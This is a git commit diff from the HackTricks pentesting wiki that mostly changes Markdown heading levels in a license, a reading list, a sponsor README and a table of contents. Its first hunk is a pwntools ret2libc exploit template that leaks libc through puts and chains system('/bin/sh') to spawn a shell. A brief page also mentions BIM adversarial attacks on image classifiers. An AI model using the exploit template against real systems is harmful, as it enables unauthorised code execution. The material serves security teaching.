This commit is contained in:
carlospolop 2022-05-01 13:41:36 +01:00
parent 71f97f5e77
commit dd633218bb
351 changed files with 4559 additions and 5199 deletions

View file

@ -1,9 +1,9 @@
from pwn import * # Import pwntools from pwn import * # Import pwntools
#################### ###################
#### CONNECTION #### ### CONNECTION ####
#################### ###################
LOCAL = True LOCAL = True
REMOTETTCP = False REMOTETTCP = False
REMOTESSH = False REMOTESSH = False
@ -36,9 +36,9 @@ if GDB:
gdb.attach(p.pid, "continue") gdb.attach(p.pid, "continue")
#################### ###################
#### Find offset ### ### Find offset ###
#################### ###################
OFFSET = "A"*40 OFFSET = "A"*40
if OFFSET == "": if OFFSET == "":
gdb.attach(p.pid, "c") #Attach and continue gdb.attach(p.pid, "c") #Attach and continue
@ -51,9 +51,9 @@ if OFFSET == "":
exit() exit()
##################### ####################
#### Find Gadgets ### ### Find Gadgets ###
##################### ####################
PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
MAIN_PLT = elf.symbols['main'] MAIN_PLT = elf.symbols['main']
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi" POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
@ -93,9 +93,9 @@ if libc == "":
# this implies that in the future if you search for functions in libc, the resulting address # this implies that in the future if you search for functions in libc, the resulting address
# will be the real one, you can use it directly (NOT NEED TO ADD AGAINF THE LIBC BASE ADDRESS) # will be the real one, you can use it directly (NOT NEED TO ADD AGAINF THE LIBC BASE ADDRESS)
################################# ################################
### GET SHELL with known LIBC ### ## GET SHELL with known LIBC ###
################################# ################################
BINSH = next(libc.search("/bin/sh")) #Verify with find /bin/sh BINSH = next(libc.search("/bin/sh")) #Verify with find /bin/sh
SYSTEM = libc.sym["system"] SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"] EXIT = libc.sym["exit"]
@ -108,5 +108,5 @@ rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
p.clean() p.clean()
p.sendline(rop2) p.sendline(rop2)
##### Interact with the shell ##### #### Interact with the shell #####
p.interactive() #Interact with the conenction p.interactive() #Interact with the conenction

View file

@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## 1911 - Pentesting fox
And more services: And more services:

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# 6881/udp - Pentesting BitTorrent
<details> <details>

View file

@ -24,13 +24,13 @@ Human Readable License: https://creativecommons.org/licenses/by-nc/4.0/<br>
Complete Legal Terms: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br> Complete Legal Terms: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
Formatting: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br> Formatting: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
## creative commons # creative commons
# Attribution-NonCommercial 4.0 International # Attribution-NonCommercial 4.0 International
Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible. Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible.
### Using Creative Commons Public Licenses ## Using Creative Commons Public Licenses
Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses. Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses.
@ -38,11 +38,11 @@ Creative Commons public licenses provide a standard set of terms and conditions
* __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensors permission is not necessary for any reasonfor example, because of any applicable exception or limitation to copyrightthen that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). * __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensors permission is not necessary for any reasonfor example, because of any applicable exception or limitation to copyrightthen that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
## Creative Commons Attribution-NonCommercial 4.0 International Public License # Creative Commons Attribution-NonCommercial 4.0 International Public License
By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions. By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions.
### Section 1 Definitions. ## Section 1 Definitions.
a. __Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image. a. __Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image.
@ -68,7 +68,7 @@ k. __Sui Generis Database Rights__ means rights other than copyright resulting f
l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning. l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning.
### Section 2 Scope. ## Section 2 Scope.
a. ___License grant.___ a. ___License grant.___
@ -100,7 +100,7 @@ b. ___Other rights.___
3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes. 3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes.
### Section 3 License Conditions. ## Section 3 License Conditions.
Your exercise of the Licensed Rights is expressly made subject to the following conditions. Your exercise of the Licensed Rights is expressly made subject to the following conditions.
@ -130,7 +130,7 @@ a. ___Attribution.___
4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted Material from complying with this Public License. 4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted Material from complying with this Public License.
### Section 4 Sui Generis Database Rights. ## Section 4 Sui Generis Database Rights.
Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material: Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material:
@ -142,7 +142,7 @@ c. You must comply with the conditions in Section 3(a) if You Share all or a sub
For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights. For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights.
### Section 5 Disclaimer of Warranties and Limitation of Liability. ## Section 5 Disclaimer of Warranties and Limitation of Liability.
a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__ a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__
@ -150,7 +150,7 @@ b. __To the extent possible, in no event will the Licensor be liable to You on a
c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability. c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability.
### Section 6 Term and Termination. ## Section 6 Term and Termination.
a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically. a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically.
@ -166,13 +166,13 @@ c. For the avoidance of doubt, the Licensor may also offer the Licensed Material
d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License. d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.
### Section 7 Other Terms and Conditions. ## Section 7 Other Terms and Conditions.
a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed. a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed.
b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License. b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License.
### Section 8 Interpretation. ## Section 8 Interpretation.
a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License. a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License.

View file

@ -1,24 +1,24 @@
# Learning Pages and VMs # Learning Pages and VMs
## https://tryhackme.com/ # https://tryhackme.com/
Tryhackme is a platform with virtual machines that need to be solved through walkthroughs, which is very good for beginners and normal CTFs where you self must hack into the machines. Tryhackme is a platform with virtual machines that need to be solved through walkthroughs, which is very good for beginners and normal CTFs where you self must hack into the machines.
## https://www.root-me.org/ # https://www.root-me.org/
Rootme is another page for online hosted virtual machines to hack. Rootme is another page for online hosted virtual machines to hack.
## https://www.vulnhub.com/ # https://www.vulnhub.com/
Vulnhub has machines to download and then to hack Vulnhub has machines to download and then to hack
## https://www.hackthebox.eu/ https://academy.hackthebox.eu/catalogue # https://www.hackthebox.eu/ https://academy.hackthebox.eu/catalogue
Hackthebox has online machines to hack, but there are very limited in the free version. Hackthebox has online machines to hack, but there are very limited in the free version.
@ -26,26 +26,26 @@ Recently the launched their academy, but it is a bit more expensive than for exa
## https://hack.me/ # https://hack.me/
This site seems to be a community platform This site seems to be a community platform
## https://www.hacker101.com/ # https://www.hacker101.com/
Free and smale site with videos and CTFs Free and smale site with videos and CTFs
## https://crackmes.one/ # https://crackmes.one/
This site has a lot of binarys for forensic learning. This site has a lot of binarys for forensic learning.
## https://overthewire.org/wargames/ # https://overthewire.org/wargames/
The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games.
Perfect for beginners. Perfect for beginners.
## https://www.hackthissite.org/missions/basic/ # https://www.hackthissite.org/missions/basic/
## https://attackdefense.com/ # https://attackdefense.com/

View file

@ -22,7 +22,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## HackTricks
![](.gitbook/assets/p.png) ![](.gitbook/assets/p.png)
@ -30,13 +29,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
Here you can find a little **introduction:** Here you can find a little **introduction:**
### [**Pentesting Methodology**](pentesting-methodology.md) ## [**Pentesting Methodology**](pentesting-methodology.md)
Here you will find the **typical flow** that **you should follow when pentesting** one or more **machines**. Here you will find the **typical flow** that **you should follow when pentesting** one or more **machines**.
**Click in the title to start!** **Click in the title to start!**
### Support HackTricks ## Support HackTricks
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
@ -46,9 +45,9 @@ And if you are a PEASS & HackTricks enthusiast, you can get your hands now on ou
You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
### Corporate Sponsors ## Corporate Sponsors
#### [STM Cyber](https://www.stmcyber.com) ### [STM Cyber](https://www.stmcyber.com)
![](<.gitbook/assets/image (642) (1) (1) (1).png>) ![](<.gitbook/assets/image (642) (1) (1) (1).png>)
@ -58,7 +57,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
**STM Cyber** also support cybersecurity open source projects like HackTricks :) **STM Cyber** also support cybersecurity open source projects like HackTricks :)
#### [Intrigiti](https://www.intigriti.com) ### [Intrigiti](https://www.intigriti.com)
![](<.gitbook/assets/image (638).png>) ![](<.gitbook/assets/image (638).png>)
@ -68,7 +67,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
{% embed url="https://go.intigriti.com/hacktricks" %} {% embed url="https://go.intigriti.com/hacktricks" %}
#### [**INE**](https://ine.com) ### [**INE**](https://ine.com)
![](.gitbook/assets/ine\_logo-3-.jpg) ![](.gitbook/assets/ine\_logo-3-.jpg)
@ -84,7 +83,7 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their *
[ine-courses-and-elearnsecurity-certifications-reviews.md](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md) [ine-courses-and-elearnsecurity-certifications-reviews.md](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
{% endcontent-ref %} {% endcontent-ref %}
### License ## License
**Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**.**\ **Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**.**\
**If you want to use it with commercial purposes, contact me.** **If you want to use it with commercial purposes, contact me.**

View file

@ -15,7 +15,7 @@
* [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md) * [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md)
* [Search Exploits](search-exploits.md) * [Search Exploits](search-exploits.md)
## Shells # Shells
* [Shells (Linux, Windows, MSFVenom)](shells/shells/README.md) * [Shells (Linux, Windows, MSFVenom)](shells/shells/README.md)
* [MSFVenom - CheatSheet](shells/shells/msfvenom.md) * [MSFVenom - CheatSheet](shells/shells/msfvenom.md)
@ -23,7 +23,7 @@
* [Shells - Linux](shells/shells/linux.md) * [Shells - Linux](shells/shells/linux.md)
* [Full TTYs](shells/shells/full-ttys.md) * [Full TTYs](shells/shells/full-ttys.md)
## Linux/Unix # Linux/Unix
* [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md) * [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
* [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md) * [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
@ -62,7 +62,7 @@
* [Bypass Bash Restrictions](linux-unix/useful-linux-commands/bypass-bash-restrictions.md) * [Bypass Bash Restrictions](linux-unix/useful-linux-commands/bypass-bash-restrictions.md)
* [Linux Environment Variables](linux-unix/linux-environment-variables.md) * [Linux Environment Variables](linux-unix/linux-environment-variables.md)
## MacOS # MacOS
* [MacOS Security & Privilege Escalation](macos/macos-security-and-privilege-escalation/README.md) * [MacOS Security & Privilege Escalation](macos/macos-security-and-privilege-escalation/README.md)
* [Mac OS Architecture](macos/macos-security-and-privilege-escalation/mac-os-architecture.md) * [Mac OS Architecture](macos/macos-security-and-privilege-escalation/mac-os-architecture.md)
@ -73,7 +73,7 @@
* [MacOS Serial Number](macos/macos-security-and-privilege-escalation/macos-serial-number.md) * [MacOS Serial Number](macos/macos-security-and-privilege-escalation/macos-serial-number.md)
* [MacOS Apps - Inspecting, debugging and Fuzzing](macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md) * [MacOS Apps - Inspecting, debugging and Fuzzing](macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md)
## Windows # Windows
* [Checklist - Local Windows Privilege Escalation](windows/checklist-windows-privilege-escalation.md) * [Checklist - Local Windows Privilege Escalation](windows/checklist-windows-privilege-escalation.md)
* [Windows Local Privilege Escalation](windows/windows-local-privilege-escalation/README.md) * [Windows Local Privilege Escalation](windows/windows-local-privilege-escalation/README.md)
@ -138,7 +138,7 @@
* [PowerView](windows/basic-powershell-for-pentesters/powerview.md) * [PowerView](windows/basic-powershell-for-pentesters/powerview.md)
* [AV Bypass](windows/av-bypass.md) * [AV Bypass](windows/av-bypass.md)
## Mobile Apps Pentesting # Mobile Apps Pentesting
* [Android APK Checklist](mobile-apps-pentesting/android-checklist.md) * [Android APK Checklist](mobile-apps-pentesting/android-checklist.md)
* [Android Applications Pentesting](mobile-apps-pentesting/android-app-pentesting/README.md) * [Android Applications Pentesting](mobile-apps-pentesting/android-app-pentesting/README.md)
@ -185,7 +185,7 @@
* [iOS UIPasteboard](mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md) * [iOS UIPasteboard](mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md)
* [iOS WebViews](mobile-apps-pentesting/ios-pentesting/ios-webviews.md) * [iOS WebViews](mobile-apps-pentesting/ios-pentesting/ios-webviews.md)
## Pentesting # Pentesting
* [Pentesting Network](pentesting/pentesting-network/README.md) * [Pentesting Network](pentesting/pentesting-network/README.md)
* [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) * [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
@ -365,7 +365,7 @@
* [50030,50060,50070,50075,50090 - Pentesting Hadoop](pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md) * [50030,50060,50070,50075,50090 - Pentesting Hadoop](pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md)
* [Pentesting Remote GdbServer](pentesting/pentesting-remote-gdbserver.md) * [Pentesting Remote GdbServer](pentesting/pentesting-remote-gdbserver.md)
## Pentesting Web # Pentesting Web
* [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md) * [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
* [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md) * [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
@ -474,7 +474,7 @@
* [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md) * [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
* [XS-Search](pentesting-web/xs-search.md) * [XS-Search](pentesting-web/xs-search.md)
## Forensics # Forensics
* [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md) * [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md)
* [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md) * [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md)
@ -508,7 +508,7 @@
* [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md) * [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md)
* [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md) * [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
## Cloud Security # Cloud Security
* [GCP Security](cloud-security/gcp-security/README.md) * [GCP Security](cloud-security/gcp-security/README.md)
* [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md) * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
@ -559,7 +559,7 @@
* [Cloud Security Review](cloud-security/cloud-security-review.md) * [Cloud Security Review](cloud-security/cloud-security-review.md)
* [AWS Security](cloud-security/aws-security.md) * [AWS Security](cloud-security/aws-security.md)
## A.I. Exploiting # A.I. Exploiting
* [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md) * [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md)
* [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md) * [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md)
@ -569,16 +569,16 @@
* [ML Basics](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md) * [ML Basics](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md)
* [Feature Engineering](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md) * [Feature Engineering](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md)
## Blockchain # Blockchain
* [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md) * [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md)
* [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md) * [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md)
## Courses and Certifications Reviews # Courses and Certifications Reviews
* [INE Courses and eLearnSecurity Certifications Reviews](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md) * [INE Courses and eLearnSecurity Certifications Reviews](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
## Physical attacks # Physical attacks
* [Physical Attacks](physical-attacks/physical-attacks.md) * [Physical Attacks](physical-attacks/physical-attacks.md)
* [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md) * [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md)
@ -587,7 +587,7 @@
* [Bootloader testing](physical-attacks/firmware-analysis/bootloader-testing.md) * [Bootloader testing](physical-attacks/firmware-analysis/bootloader-testing.md)
* [Firmware Integrity](physical-attacks/firmware-analysis/firmware-integrity.md) * [Firmware Integrity](physical-attacks/firmware-analysis/firmware-integrity.md)
## Reversing # Reversing
* [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md) * [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
* [Angr](reversing/reversing-tools-basic-methods/angr/README.md) * [Angr](reversing/reversing-tools-basic-methods/angr/README.md)
@ -600,7 +600,7 @@
* [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md) * [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md)
* [Word Macros](reversing/word-macros.md) * [Word Macros](reversing/word-macros.md)
## Exploiting # Exploiting
* [Linux Exploiting (Basic) (SPA)](exploiting/linux-exploiting-basic-esp/README.md) * [Linux Exploiting (Basic) (SPA)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format Strings Template](exploiting/linux-exploiting-basic-esp/format-strings-template.md) * [Format Strings Template](exploiting/linux-exploiting-basic-esp/format-strings-template.md)
@ -614,7 +614,7 @@
* [PwnTools](exploiting/tools/pwntools.md) * [PwnTools](exploiting/tools/pwntools.md)
* [Windows Exploiting (Basic Guide - OSCP lvl)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md) * [Windows Exploiting (Basic Guide - OSCP lvl)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
## Cryptography # Cryptography
* [Certificates](cryptography/certificates.md) * [Certificates](cryptography/certificates.md)
* [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md) * [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md)
@ -624,19 +624,19 @@
* [Padding Oracle](cryptography/padding-oracle-priv.md) * [Padding Oracle](cryptography/padding-oracle-priv.md)
* [RC4 - Encrypt\&Decrypt](cryptography/rc4-encrypt-and-decrypt.md) * [RC4 - Encrypt\&Decrypt](cryptography/rc4-encrypt-and-decrypt.md)
## BACKDOORS # BACKDOORS
* [Merlin](backdoors/merlin.md) * [Merlin](backdoors/merlin.md)
* [Empire](backdoors/empire.md) * [Empire](backdoors/empire.md)
* [Salseo](backdoors/salseo.md) * [Salseo](backdoors/salseo.md)
* [ICMPsh](backdoors/icmpsh.md) * [ICMPsh](backdoors/icmpsh.md)
## Stego # Stego
* [Stego Tricks](stego/stego-tricks.md) * [Stego Tricks](stego/stego-tricks.md)
* [Esoteric languages](stego/esoteric-languages.md) * [Esoteric languages](stego/esoteric-languages.md)
## MISC # MISC
* [Basic Python](misc/basic-python/README.md) * [Basic Python](misc/basic-python/README.md)
* [venv](misc/basic-python/venv.md) * [venv](misc/basic-python/venv.md)
@ -647,7 +647,7 @@
* [Bruteforce hash (few chars)](misc/basic-python/bruteforce-hash-few-chars.md) * [Bruteforce hash (few chars)](misc/basic-python/bruteforce-hash-few-chars.md)
* [Other Big References](misc/references.md) * [Other Big References](misc/references.md)
## TODO # TODO
* [More Tools](todo/more-tools.md) * [More Tools](todo/more-tools.md)
* [MISC](todo/misc.md) * [MISC](todo/misc.md)

View file

@ -17,18 +17,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
#BRUTEFORCER CORE SCRIPT WITH BIM ATTACK This time we introduce a new type of gradient based attack, in order to brute force an image classification app (can be shaped and used for any input of course), the BIM, or Basic Iteration Method.
This time we introduce a new type of gradient based attack, in order to brute force an image classification app (can be shaped and used for any input of course), the BIM, or Basic Iteration Method. It's reccomended to see at least the explanation in the [**introduction challenge colab Notebook**](//https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR)
